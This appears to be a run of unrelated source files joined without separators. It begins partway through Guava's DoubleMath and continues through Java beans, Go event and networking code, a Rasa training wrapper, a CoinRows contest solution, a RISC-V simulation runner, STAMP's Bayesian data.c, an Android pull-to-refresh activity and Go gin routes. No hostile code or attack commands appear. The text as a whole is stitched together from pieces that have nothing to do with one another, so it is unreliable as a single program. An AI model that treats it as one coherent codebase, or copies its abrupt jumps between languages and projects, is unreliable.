   * <p>This is reflexive and symmetric, but <em>not</em> transitive, so it is <em>not</em> an
   * equivalence relation and <em>not</em> suitable for use in {@link Object#equals}
   * implementations.
   *
   * @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN
   * @since 13.0
   */
  public static boolean fuzzyEquals(double a, double b, double tolerance) {
    MathPreconditions.checkNonNegative("tolerance", tolerance);
    return Math.copySign(a - b, 1.0) <= tolerance
        // copySign(x, 1.0) is a branch-free version of abs(x), but with different NaN semantics
        || (a == b) // needed to ensure that infinities equal themselves
        || (Double.isNaN(a) && Double.isNaN(b));
  }

  /**
   * Compares {@code a} and {@code b} "fuzzily," with a tolerance for nearly-equal values.
   *
   * <p>This method is equivalent to
   * {@code fuzzyEquals(a, b, tolerance) ? 0 : Double.compare(a, b)}. In particular, like
   * {@link Double#compare(double, double)}, it treats all NaN values as equal and greater than all
   * other values (including {@link Double#POSITIVE_INFINITY}).
   *
   * <p>This is <em>not</em> a total ordering and is <em>not</em> suitable for use in
   * {@link Comparable#compareTo} implementations. In particular, it is not transitive.
   *
   * @throws IllegalArgumentException if {@code tolerance} is {@code < 0} or NaN
   * @since 13.0
   */
  public static int fuzzyCompare(double a, double b, double tolerance) {
    if (fuzzyEquals(a, b, tolerance)) {
      return 0;
    } else if (a < b) {
      return -1;
    } else if (a > b) {
      return 1;
    } else {
      return Booleans.compare(Double.isNaN(a), Double.isNaN(b));
    }
  }

  /**
   * Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
   * {@code values}.
   *
   * <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
   * the arithmetic mean of the population.
   *
   * @param values a nonempty series of values
   * @throws IllegalArgumentException if {@code values} is empty
   */
  public static double mean(int... values) {
    checkArgument(values.length > 0, "Cannot take mean of 0 values");
    // The upper bound on the length of an array and the bounds on the int values mean that, in
    // this case only, we can compute the sum as a long without risking overflow or loss of
    // precision. So we do that, as it's slightly quicker than the Knuth algorithm.
    long sum = 0;
    for (int index = 0; index < values.length; ++index) {
      sum += values[index];
    }
    return (double) sum / values.length;
  }

  /**
   * Returns the <a href="http://en.wikipedia.org/wiki/Arithmetic_mean">arithmetic mean</a> of
   * {@code values}.
   *
   * <p>If these values are a sample drawn from a population, this is also an unbiased estimator of
   * the arithmetic mean of the population.
   *
   * @param values a nonempty series of values, which will be converted to {@code double} values
   *     (this may cause loss of precision for longs of magnitude over 2^53 (slightly over 9e15))
   * @throws IllegalArgumentException if {@code values} is empty
   */
  public static double mean(long... values) {
    checkArgument(values.length > 0, "Cannot take mean of 0 values");
    long count = 1;
    double mean = values[0];
    for (int index = 1; index < values.length; ++index) {
      count++;
      // Art of Computer Programming vol. 
2, Knuth, 4.2.2, (15) mean += (values[index] - mean) / count; } return mean; } private DoubleMath() {} }
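The `mean(long...)` overload above uses Knuth's online update (Art of Computer Programming vol. 2, 4.2.2, eq. 15) instead of dividing a running sum, because summing longs into a double can overflow or lose precision. A minimal Python sketch of that update, for illustration only (the function name is mine, not Guava's):

```python
def running_mean(values):
    """Knuth's incremental mean: mean += (x - mean) / n.

    Unlike sum(values) / len(values), no large intermediate sum is formed,
    which is the reason DoubleMath.mean(long...) uses this update for longs
    whose sum could overflow or lose precision.
    """
    if not values:
        raise ValueError("Cannot take mean of 0 values")
    mean = 0.0
    for n, x in enumerate(values, start=1):
        mean += (x - mean) / n
    return mean
```

Each step keeps `mean` equal to the mean of the first `n` elements, so the intermediate values stay on the order of the data itself rather than its sum.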
/** * Represents an "enterprise" (e.g. an organisation, a department, etc). */ public final class Enterprise { private String name; Enterprise() { } /** * Creates a new enterprise with the specified name. * * @param name the name, as a String * @throws IllegalArgumentException if the name is not specified */ public Enterprise(String name) { if (name == null || name.trim().length() == 0) { throw new IllegalArgumentException("Name must be specified."); } this.name = name; } /** * Gets the name of this enterprise. * * @return the name, as a String */ public String getName() { return name; } }
package gwl

const (
	eventButtonType = 0x00
)

type Event interface {
	Type() uint8
}

type EventButton struct {
	Key      Key
	Pressed  bool
	Released bool
}

func (eb EventButton) Type() uint8 {
	return eventButtonType
}
from typing import Dict, Text from rasa_nlu.config import RasaNLUModelConfig from rasa_nlu.train import do_train_in_worker class InplaceTraining(object): @classmethod def train(cls, config, data, project_dir_path, project=None, fixed_model_name=None, storage=None): # type: (Dict, Text, str, str, str, str) -> None cfg = RasaNLUModelConfig(config) do_train_in_worker( cfg, data, path=project_dir_path, project=project, fixed_model_name=fixed_model_name, storage=storage, component_builder=None ) inplace_train = InplaceTraining.train
# ampoule/__init__.py
from .pool import deferToAMPProcess, pp
from .commands import Shutdown, Ping, Echo
from .child import AMPChild
from ._version import __version__ as _my_version

__version__ = _my_version.short()

__all__ = [
    'deferToAMPProcess',
    'pp',
    'Shutdown',
    'Ping',
    'Echo',
    'AMPChild',
    '__version__',
]
// NetworkPayload returns the payload of network layer, used for fragmentation. func (indicator *PacketIndicator) NetworkPayload() []byte { if indicator.NetworkLayer() == nil { return nil } return indicator.NetworkLayer().LayerPayload() }
import java.util.*; public class CoinRows { public static void main(String[] args) { Scanner sc=new Scanner(System.in); int t=sc.nextInt(); while(t-->0) { int m=sc.nextInt(); int arr[]=new int[m]; int brr[]=new int[m]; long presum[]=new long[m]; long sufsum[]=new long[m]; for(int i=0;i<m;i++) { arr[i]=sc.nextInt(); } brr[0]=sc.nextInt(); presum[0]=brr[0]; for(int i=1;i<m;i++) { brr[i]=sc.nextInt(); presum[i]=brr[i]+presum[i-1]; } // if(t==10000-41) { // System.out.println(m); // System.out.println(Arrays.toString(arr)); // System.out.println(Arrays.toString(brr)); // } if(m==1) { System.out.println(0); continue; } if(m==2) { System.out.println(Math.min(arr[m-1],brr[0])); continue; } sufsum[m-1]=arr[m-1]; for(int i=m-2;i>=0;i--) { sufsum[i]=arr[i]+sufsum[i+1]; } long ans=presum[m-2]; long now=0; for(int i=m-1,j=m-3;j>=0;i--,j--) { now=Math.max(presum[j],sufsum[i]); ans=Math.min(ans,now); //System.out.println(ans+" "+now); } ans=Math.min(ans,sufsum[1]); System.out.println(ans); // System.out.println(Arrays.toString(sufsum)); // System.out.println(Arrays.toString(presum)); } } }
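The Java solution above implements the standard prefix/suffix-sum argument for this problem: if the first player turns down at column j, the second player is left with either the top-row coins to the right of j or the bottom-row coins to the left of j, and takes the larger; the first player picks j to minimise that maximum. A compact Python sketch of the same computation (the function name is mine):

```python
from itertools import accumulate

def coin_rows(a, b):
    """min over turn columns j of max(top-row suffix after j,
    bottom-row prefix before j) -- the quantity the Java loop computes."""
    m = len(a)
    pre_b = list(accumulate(b))                  # pre_b[j] = b[0] + ... + b[j]
    suf_a = list(accumulate(reversed(a)))[::-1]  # suf_a[j] = a[j] + ... + a[m-1]
    best = float("inf")
    for j in range(m):                           # first player turns down at column j
        right = suf_a[j + 1] if j + 1 < m else 0  # top row, right of the turn
        left = pre_b[j - 1] if j > 0 else 0       # bottom row, left of the turn
        best = min(best, max(left, right))
    return best
```

The single loop over j subsumes the Java code's m==1 and m==2 special cases: with one column both leftover segments are empty, giving 0.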
// OnAfterRequest registers an event handler that fires after a request is processed by the controller func OnAfterRequest(callback func(client *Client, request *Request, response *Message)) { on("after-request", func(args ...interface{}) { if len(args) > 2 { callback(args[0].(*Client), args[1].(*Request), args[2].(*Message)) } }) }
def generate_ddocs(self, index_type): return { 'ddoc': { 'views': self.MAP_FUNCS[index_type] } }
def run_c(c_test, iss_yaml, isa, mabi, gcc_opts, iss_opts, output_dir, setting_dir, debug_cmd): if not c_test.endswith(".c"): logging.error("%s is not a .c file" % c_test) return cwd = os.path.dirname(os.path.realpath(__file__)) c_test = os.path.expanduser(c_test) report = ("%s/iss_regr.log" % output_dir).rstrip() c = re.sub(r"^.*\/", "", c_test) c = re.sub(r"\.c$", "", c) prefix = ("%s/directed_c_tests/%s" % (output_dir, c)) elf = prefix + ".o" binary = prefix + ".bin" iss_list = iss_opts.split(",") run_cmd("mkdir -p %s/directed_c_tests" % output_dir) logging.info("Compiling c test : %s" % c_test) cmd = ("%s -mcmodel=medany -nostdlib \ -nostartfiles %s \ -I%s/user_extension \ -T%s/scripts/link.ld %s -o %s " % \ (get_env_var("RISCV_GCC", debug_cmd = debug_cmd), c_test, cwd, cwd, gcc_opts, elf)) cmd += (" -march=%s" % isa) cmd += (" -mabi=%s" % mabi) run_cmd_output(cmd.split(), debug_cmd = debug_cmd) logging.info("Converting to %s" % binary) cmd = ("%s -O binary %s %s" % (get_env_var("RISCV_OBJCOPY", debug_cmd = debug_cmd), elf, binary)) run_cmd_output(cmd.split(), debug_cmd = debug_cmd) log_list = [] for iss in iss_list: run_cmd("mkdir -p %s/%s_sim" % (output_dir, iss)) log = ("%s/%s_sim/%s.log" % (output_dir, iss, c)) log_list.append(log) base_cmd = parse_iss_yaml(iss, iss_yaml, isa, setting_dir, debug_cmd) logging.info("[%0s] Running ISS simulation: %s" % (iss, elf)) cmd = get_iss_cmd(base_cmd, elf, log) run_cmd(cmd, 10, debug_cmd = debug_cmd) logging.info("[%0s] Running ISS simulation: %s ...done" % (iss, elf)) if len(iss_list) == 2: compare_iss_log(iss_list, log_list, report)
/**
 * The group link object links a host prototype with a host group and has the following properties.
 * <p/>
 * Created by Suguru Yajima on 2014/06/04.
 */
public class GroupLinkObject {

    /**
     * (readonly) ID of the group link.
     */
    private Integer group_prototypeid;

    /**
     * ID of the host group.
     */
    private Integer groupid;

    /**
     * (readonly) ID of the host prototype.
     */
    private Integer hostid;

    /**
     * (readonly) ID of the parent template group link.
     */
    private Integer templateid;

    /**
     * Gets the readonly ID of the parent template group link.
     *
     * @return the ID of the parent template group link
     */
    public Integer getTemplateid() {
        return templateid;
    }

    /**
     * Sets a new readonly ID of the parent template group link.
     *
     * @param templateid the new ID of the parent template group link
     */
    public void setTemplateid(Integer templateid) {
        this.templateid = templateid;
    }

    /**
     * Gets the readonly ID of the host prototype.
     *
     * @return the ID of the host prototype
     */
    public Integer getHostid() {
        return hostid;
    }

    /**
     * Sets a new readonly ID of the host prototype.
     *
     * @param hostid the new ID of the host prototype
     */
    public void setHostid(Integer hostid) {
        this.hostid = hostid;
    }

    /**
     * Gets the ID of the host group.
     *
     * @return the ID of the host group
     */
    public Integer getGroupid() {
        return groupid;
    }

    /**
     * Sets a new ID of the host group.
     *
     * @param groupid the new ID of the host group
     */
    public void setGroupid(Integer groupid) {
        this.groupid = groupid;
    }

    /**
     * Gets the readonly ID of the group link.
     *
     * @return the ID of the group link
     */
    public Integer getGroup_prototypeid() {
        return group_prototypeid;
    }

    /**
     * Sets a new readonly ID of the group link.
     *
     * @param group_prototypeid the new ID of the group link
     */
    public void setGroup_prototypeid(Integer group_prototypeid) {
        this.group_prototypeid = group_prototypeid;
    }
}
package cz.cuni.amis.clear2d.engine.textures;

import java.io.IOException;
import java.io.InputStream;

import javax.imageio.ImageIO;

import cz.cuni.amis.clear2d.engine.textures.TextureAtlasXML.SubtextureXML;

public class TextureAtlasResource extends TextureAtlas {

	public TextureAtlasResource(InputStream atlasXMLInputStream, String atlasResourcePrefix) {
		super();
		load(atlasXMLInputStream, atlasResourcePrefix);
	}

	private void load(InputStream atlasXMLInputStream, String atlasResourcePrefix) {
		if (atlasXMLInputStream == null) {
			throw new RuntimeException("atlasXMLInputStream == null, invalid");
		}
		if (atlasResourcePrefix == null) {
			atlasResourcePrefix = "./";
		}

		TextureAtlasXML atlas = TextureAtlasXML.loadXML(atlasXMLInputStream);

		// LOAD SHEET
		String resourcePath = atlasResourcePrefix + "/" + atlas.imagePath;
		try {
			setImage(ImageIO.read(getClass().getClassLoader().getResourceAsStream(resourcePath)));
		} catch (IOException e) {
			throw new RuntimeException("Failed to read resource: " + atlas.imagePath + " => " + resourcePath);
		}

		for (SubtextureXML subtextureXML : atlas.subtextures) {
			Subtexture subtexture = new Subtexture(subtextureXML.name, this, subtextureXML.x, subtextureXML.y, subtextureXML.x + subtextureXML.width, subtextureXML.y + subtextureXML.height);
			textures.put(subtexture.name, subtexture);
		}
	}
}
/* ============================================================================= * * data.c * * ============================================================================= * * Copyright (C) Stanford University, 2006. All Rights Reserved. * Author: <NAME> * * ============================================================================= * * For the license of bayes/sort.h and bayes/sort.c, please see the header * of the files. * * ------------------------------------------------------------------------ * * For the license of kmeans, please see kmeans/LICENSE.kmeans * * ------------------------------------------------------------------------ * * For the license of ssca2, please see ssca2/COPYRIGHT * * ------------------------------------------------------------------------ * * For the license of lib/mt19937ar.c and lib/mt19937ar.h, please see the * header of the files. * * ------------------------------------------------------------------------ * * For the license of lib/rbtree.h and lib/rbtree.c, please see * lib/LEGALNOTICE.rbtree and lib/LICENSE.rbtree * * ------------------------------------------------------------------------ * * Unless otherwise noted, the following license applies to STAMP files: * * Copyright (c) 2007, Stanford University * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * * Neither the name of Stanford University nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. 
* * THIS SOFTWARE IS PROVIDED BY STANFORD UNIVERSITY ``AS IS'' AND ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL STANFORD UNIVERSITY BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGE. * * ============================================================================= */ #include <assert.h> #include <stdlib.h> #include <string.h> #include "bitmap.h" #include "data.h" #include "net.h" #include "random.h" #include "sort.h" #include "types.h" #include "vector.h" enum data_config { DATA_PRECISION = 100, DATA_INIT = 2 /* not 0 or 1 */ }; /* ============================================================================= * data_alloc * ============================================================================= */ data_t* data_alloc (long numVar, long numRecord, random_t* randomPtr) { data_t* dataPtr; dataPtr = (data_t*)malloc(sizeof(data_t)); if (dataPtr) { long numDatum = numVar * numRecord; dataPtr->records = (char*)malloc(numDatum * sizeof(char)); if (dataPtr->records == NULL) { free(dataPtr); return NULL; } memset(dataPtr->records, DATA_INIT, (numDatum * sizeof(char))); dataPtr->numVar = numVar; dataPtr->numRecord = numRecord; dataPtr->randomPtr = randomPtr; } return dataPtr; } /* ============================================================================= * data_free * ============================================================================= */ void data_free (data_t* dataPtr) { free(dataPtr->records); 
free(dataPtr); } /* ============================================================================= * data_generate * -- Binary variables of random PDFs * -- If seed is <0, do not reseed * -- Returns random network * ============================================================================= */ net_t* data_generate (data_t* dataPtr, long seed, long maxNumParent, long percentParent) { random_t* randomPtr = dataPtr->randomPtr; if (seed >= 0) { random_seed(randomPtr, seed); } /* * Generate random Bayesian network */ long numVar = dataPtr->numVar; net_t* netPtr = net_alloc(numVar); assert(netPtr); net_generateRandomEdges(netPtr, maxNumParent, percentParent, randomPtr); /* * Create a threshold for each of the possible permutation of variable * value instances */ long** thresholdsTable = (long**)malloc(numVar * sizeof(long*)); assert(thresholdsTable); long v; for (v = 0; v < numVar; v++) { list_t* parentIdListPtr = net_getParentIdListPtr(netPtr, v); long numThreshold = 1 << list_getSize(parentIdListPtr); long* thresholds = (long*)malloc(numThreshold * sizeof(long)); assert(thresholds); long t; for (t = 0; t < numThreshold; t++) { long threshold = random_generate(randomPtr) % (DATA_PRECISION + 1); thresholds[t] = threshold; } thresholdsTable[v] = thresholds; } /* * Create variable dependency ordering for record generation */ long* order = (long*)malloc(numVar * sizeof(long)); assert(order); long numOrder = 0; queue_t* workQueuePtr = queue_alloc(-1); assert(workQueuePtr); vector_t* dependencyVectorPtr = vector_alloc(1); assert(dependencyVectorPtr); bitmap_t* orderedBitmapPtr = bitmap_alloc(numVar); assert(orderedBitmapPtr); bitmap_clearAll(orderedBitmapPtr); bitmap_t* doneBitmapPtr = bitmap_alloc(numVar); assert(doneBitmapPtr); bitmap_clearAll(doneBitmapPtr); v = -1; while ((v = bitmap_findClear(doneBitmapPtr, (v + 1))) >= 0) { list_t* childIdListPtr = net_getChildIdListPtr(netPtr, v); long numChild = list_getSize(childIdListPtr); if (numChild == 0) { bool_t status; /* * 
Use breadth-first search to find net connected to this leaf */ queue_clear(workQueuePtr); status = queue_push(workQueuePtr, (void*)v); assert(status); while (!queue_isEmpty(workQueuePtr)) { long id = (long)queue_pop(workQueuePtr); status = bitmap_set(doneBitmapPtr, id); assert(status); status = vector_pushBack(dependencyVectorPtr, (void*)id); assert(status); list_t* parentIdListPtr = net_getParentIdListPtr(netPtr, id); list_iter_t it; list_iter_reset(&it, parentIdListPtr); while (list_iter_hasNext(&it, parentIdListPtr)) { long parentId = (long)list_iter_next(&it, parentIdListPtr); status = queue_push(workQueuePtr, (void*)parentId); assert(status); } } /* * Create ordering */ long i; long n = vector_getSize(dependencyVectorPtr); for (i = 0; i < n; i++) { long id = (long)vector_popBack(dependencyVectorPtr); if (!bitmap_isSet(orderedBitmapPtr, id)) { bitmap_set(orderedBitmapPtr, id); order[numOrder++] = id; } } } } assert(numOrder == numVar); /* * Create records */ char* record = dataPtr->records; long r; long numRecord = dataPtr->numRecord; for (r = 0; r < numRecord; r++) { long o; for (o = 0; o < numOrder; o++) { long v = order[o]; list_t* parentIdListPtr = net_getParentIdListPtr(netPtr, v); long index = 0; list_iter_t it; list_iter_reset(&it, parentIdListPtr); while (list_iter_hasNext(&it, parentIdListPtr)) { long parentId = (long)list_iter_next(&it, parentIdListPtr); long value = record[parentId]; assert(value != DATA_INIT); index = (index << 1) + value; } long rnd = random_generate(randomPtr) % DATA_PRECISION; long threshold = thresholdsTable[v][index]; record[v] = ((rnd < threshold) ? 
1 : 0); } record += numVar; assert(record <= (dataPtr->records + numRecord * numVar)); } /* * Clean up */ bitmap_free(doneBitmapPtr); bitmap_free(orderedBitmapPtr); vector_free(dependencyVectorPtr); queue_free(workQueuePtr); free(order); for (v = 0; v < numVar; v++) { free(thresholdsTable[v]); } free(thresholdsTable); return netPtr; } /* ============================================================================= * data_getRecord * -- Returns NULL if invalid index * ============================================================================= */ char* data_getRecord (data_t* dataPtr, long index) { if (index < 0 || index >= (dataPtr->numRecord)) { return NULL; } return &dataPtr->records[index * dataPtr->numVar]; } /* ============================================================================= * data_copy * -- Returns FALSE on failure * ============================================================================= */ bool_t data_copy (data_t* dstPtr, data_t* srcPtr) { long numDstDatum = dstPtr->numVar * dstPtr->numRecord; long numSrcDatum = srcPtr->numVar * srcPtr->numRecord; if (numDstDatum != numSrcDatum) { free(dstPtr->records); dstPtr->records = (char*)calloc(numSrcDatum, sizeof(char)); if (dstPtr->records == NULL) { return FALSE; } } dstPtr->numVar = srcPtr->numVar; dstPtr->numRecord = srcPtr->numRecord; memcpy(dstPtr->records, srcPtr->records, (numSrcDatum * sizeof(char))); return TRUE; } /* ============================================================================= * compareRecord * ============================================================================= */ static int compareRecord (const void* p1, const void* p2, long n, long offset) { long i = n - offset; const char* s1 = (const char*)p1 + offset; const char* s2 = (const char*)p2 + offset; while (i-- > 0) { unsigned char u1 = (unsigned char)*s1++; unsigned char u2 = (unsigned char)*s2++; if (u1 != u2) { return (u1 - u2); } } return 0; } /* 
============================================================================= * data_sort * -- In place * ============================================================================= */ void data_sort (data_t* dataPtr, long start, long num, long offset) { assert(start >= 0 && start <= dataPtr->numRecord); assert(num >= 0 && num <= dataPtr->numRecord); assert(start + num >= 0 && start + num <= dataPtr->numRecord); long numVar = dataPtr->numVar; sort((dataPtr->records + (start * numVar)), num, numVar, &compareRecord, numVar, offset); } /* ============================================================================= * data_findSplit * -- Call data_sort first with proper start, num, offset * -- Returns number of zeros in offset column * ============================================================================= */ long data_findSplit (data_t* dataPtr, long start, long num, long offset) { long low = start; long high = start + num - 1; long numVar = dataPtr->numVar; char* records = dataPtr->records; while (low <= high) { long mid = (low + high) / 2; if (records[numVar * mid + offset] == 0) { low = mid + 1; } else { high = mid - 1; } } return (low - start); } /* ############################################################################# * TEST_DATA * ############################################################################# */ #ifdef TEST_DATA #include <stdio.h> #include <string.h> static void printRecords (data_t* dataPtr) { long numVar = dataPtr->numVar; long numRecord = dataPtr->numRecord; long r; for (r = 0; r < numRecord; r++) { printf("%4li: ", r); char* record = data_getRecord(dataPtr, r); assert(record); long v; for (v = 0; v < numVar; v++) { printf("%li", (long)record[v]); } puts(""); } puts(""); } static void testAll (long numVar, long numRecord, long numMaxParent, long percentParent) { random_t* randomPtr = random_alloc(); puts("Starting..."); data_t* dataPtr = data_alloc(numVar, numRecord, randomPtr); assert(dataPtr); puts("Init:"); net_t* netPtr = 
        data_generate(dataPtr, 0, numMaxParent, percentParent);
    net_free(netPtr);
    printRecords(dataPtr);

    puts("Sort first half from 0:");
    data_sort(dataPtr, 0, numRecord/2, 0);
    printRecords(dataPtr);

    puts("Sort second half from 0:");
    data_sort(dataPtr, numRecord/2, numRecord-numRecord/2, 0);
    printRecords(dataPtr);

    puts("Sort all from mid:");
    data_sort(dataPtr, 0, numRecord, numVar/2);
    printRecords(dataPtr);

    long split = data_findSplit(dataPtr, 0, numRecord, numVar/2);
    printf("Split = %li\n", split);

    long v;
    for (v = 0; v < numVar; v++) {
        data_sort(dataPtr, 0, numRecord, v);
        long s = data_findSplit(dataPtr, 0, numRecord, v);
        if (s < numRecord) {
            assert(dataPtr->records[numVar * s + v] == 1);
        }
        if (s > 0) {
            assert(dataPtr->records[numVar * (s - 1) + v] == 0);
        }
    }

    memset(dataPtr->records, 0, dataPtr->numVar * dataPtr->numRecord);
    for (v = 0; v < numVar; v++) {
        data_sort(dataPtr, 0, numRecord, v);
        long s = data_findSplit(dataPtr, 0, numRecord, v);
        if (s < numRecord) {
            assert(dataPtr->records[numVar * s + v] == 1);
        }
        if (s > 0) {
            assert(dataPtr->records[numVar * (s - 1) + v] == 0);
        }
        assert(s == numRecord);
    }

    memset(dataPtr->records, 1, dataPtr->numVar * dataPtr->numRecord);
    for (v = 0; v < numVar; v++) {
        data_sort(dataPtr, 0, numRecord, v);
        long s = data_findSplit(dataPtr, 0, numRecord, v);
        if (s < numRecord) {
            assert(dataPtr->records[numVar * s + v] == 1);
        }
        if (s > 0) {
            assert(dataPtr->records[numVar * (s - 1) + v] == 0);
        }
        assert(s == 0);
    }

    data_free(dataPtr);
}

static void
testBasic (long numVar, long numRecord, long numMaxParent, long percentParent)
{
    random_t* randomPtr = random_alloc();

    puts("Starting...");

    data_t* dataPtr = data_alloc(numVar, numRecord, randomPtr);
    assert(dataPtr);

    puts("Init:");
    data_generate(dataPtr, 0, numMaxParent, percentParent);

    long v;
    for (v = 0; v < numVar; v++) {
        data_sort(dataPtr, 0, numRecord, v);
        long s = data_findSplit(dataPtr, 0, numRecord, v);
        if (s < numRecord) {
            assert(dataPtr->records[numVar * s + v] == 1);
        }
        if (s > 0) {
            assert(dataPtr->records[numVar * (s - 1) + v] == 0);
        }
    }

    memset(dataPtr->records, 0, dataPtr->numVar * dataPtr->numRecord);
    for (v = 0; v < numVar; v++) {
        data_sort(dataPtr, 0, numRecord, v);
        long s = data_findSplit(dataPtr, 0, numRecord, v);
        if (s < numRecord) {
            assert(dataPtr->records[numVar * s + v] == 1);
        }
        if (s > 0) {
            assert(dataPtr->records[numVar * (s - 1) + v] == 0);
        }
        assert(s == numRecord);
    }

    memset(dataPtr->records, 1, dataPtr->numVar * dataPtr->numRecord);
    for (v = 0; v < numVar; v++) {
        data_sort(dataPtr, 0, numRecord, v);
        long s = data_findSplit(dataPtr, 0, numRecord, v);
        if (s < numRecord) {
            assert(dataPtr->records[numVar * s + v] == 1);
        }
        if (s > 0) {
            assert(dataPtr->records[numVar * (s - 1) + v] == 0);
        }
        assert(s == 0);
    }

    data_free(dataPtr);
}

int
main ()
{
    puts("Test 1:");
    testAll(10, 20, 10, 10);

    puts("Test 2:");
    testBasic(20, 80, 10, 20);

    puts("Done");

    return 0;
}

#endif /* TEST_DATA */


/* =============================================================================
 *
 * End of data.c
 *
 * =============================================================================
 */
package com.example.star.myrefreshtest1;

import android.app.Activity;
import android.content.Intent;
import android.support.v7.app.ActionBarActivity;
import android.os.Bundle;
import android.util.Log;
import android.view.LayoutInflater;
import android.view.Menu;
import android.view.MenuItem;
import android.view.View;
import android.view.ViewGroup;
import android.widget.ArrayAdapter;
import android.widget.ListView;
import android.widget.TextView;

public class MainActivity2Activity extends Activity implements View.OnClickListener {

    private static final String TAG = MainActivity.class.getSimpleName();

    private RefreshableView refreshableView;
    private ListView listView;
    private ArrayAdapter<String> adapter;
    private static String[] dataList = {"<NAME>", "Abbaye du Mont des Cats", "Abertam",
            "Abondance", "Ackawi", "Acorn", "Adelost", "Affidelice au Chablis",
            "Afuega'l Pitu", "Airag", "Airedale", "<NAME>", "<NAME>",
            "<NAME>", "Abbaye du Mont des Cats", "Abertam", "Abondance", "Ackawi",
            "Acorn", "Adelost", "Affidelice au Chablis", "Afuega'l Pitu", "Airag",
            "Airedale", "<NAME>", "<NAME>"};

    /**
     * Called when the activity is first created.
     */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main_activity2);
        //findViewById(R.id.main_tv).setOnClickListener(this);
        listView = (ListView) findViewById(R.id.ptr_listview);
        adapter = new ArrayAdapter<String>(this, android.R.layout.simple_list_item_1, dataList);
        listView.setAdapter(adapter);
        setListViewHeightBasedOnChildren(listView);
        refreshableView = (RefreshableView) findViewById(R.id.main_refresh_view);
        refreshableView.setRefreshableHelper(new RefreshableHelper() {
            @Override
            public View onInitRefreshHeaderView() {
                return LayoutInflater.from(MainActivity2Activity.this).inflate(R.layout.refresh_head, null);
            }

            @Override
            public boolean onInitRefreshHeight(int originRefreshHeight) {
                refreshableView.setRefreshNormalHeight(refreshableView.getOriginRefreshHeight() / 3);
                refreshableView.setRefreshingHeight(refreshableView.getOriginRefreshHeight());
                refreshableView.setRefreshArrivedStateHeight(refreshableView.getOriginRefreshHeight());
                return false;
            }

            @Override
            public void onRefreshStateChanged(View refreshView, int refreshState) {
                TextView tv = (TextView) refreshView.findViewById(R.id.refresh_head_tv);
                switch (refreshState) {
                    case RefreshableView.STATE_REFRESH_NORMAL:
                        tv.setText("正常状态"); // "Normal state"
                        //tv.setBackgroundColor(0xff);
                        break;
                    case RefreshableView.STATE_REFRESH_NOT_ARRIVED:
                        tv.setText("往下拉可以刷新"); // "Pull down to refresh"
                        break;
                    case RefreshableView.STATE_REFRESH_ARRIVED:
                        tv.setText("放手可以刷新"); // "Release to refresh"
                        break;
                    case RefreshableView.STATE_REFRESHING:
                        tv.setText("正在刷新"); // "Refreshing"
                        new Thread(new Runnable() {
                            @Override
                            public void run() {
                                try {
                                    Thread.sleep(1000l);
                                    runOnUiThread(new Runnable() {
                                        @Override
                                        public void run() {
                                            refreshableView.onCompleteRefresh();
                                        }
                                    });
                                } catch (InterruptedException e) {
                                    Log.e(TAG, "_", e);
                                }
                            }
                        }).start();
                        break;
                }
            }
        });
    }

    public void setListViewHeightBasedOnChildren(ListView listView) {
        // Get the Adapter backing the ListView
        //ListAdapter listAdapter = listView.getAdapter();
        if (adapter == null) {
            return;
        }
        int
            totalHeight = 0;
        for (int i = 0, len = adapter.getCount(); i < len; i++) {
            // getCount() returns the number of data items
            View listItem = adapter.getView(i, null, listView);
            // Measure each child view's width and height
            listItem.measure(0, 0);
            // Accumulate the total height of all children
            totalHeight += listItem.getMeasuredHeight();
        }
        ViewGroup.LayoutParams params = listView.getLayoutParams();
        params.height = totalHeight + (listView.getDividerHeight() * (adapter.getCount() - 1));
        // getDividerHeight() is the height of each divider between items;
        // params.height ends up as the full height needed to show the whole ListView
        listView.setLayoutParams(params);
    }

    @Override
    public void onClick(View v) {
        switch (v.getId()) {
            // case R.id.main_tv:
            //     Log.d(TAG, "content clicked");
            //     startActivity(new Intent(this, RefreshableListActivity.class));
            //     break;
        }
    }
}
package v1 import ( "github.com/gin-gonic/gin" "github.com/pedroribeiro/users/internal/delivery/api/v1/users" "github.com/pedroribeiro/users/internal/repository" "github.com/pedroribeiro/users/internal/usecase" "gorm.io/gorm" ) func InitRoutes(router *gin.RouterGroup, db *gorm.DB) { userRepo := repository.UserRepo{DB: db} userUsecase := usecase.UserUseCase{ Repo: &userRepo, } userHandler := users.UserHandler{ UserUseCase: &userUsecase, } userHandler.InitRoutes(router) }
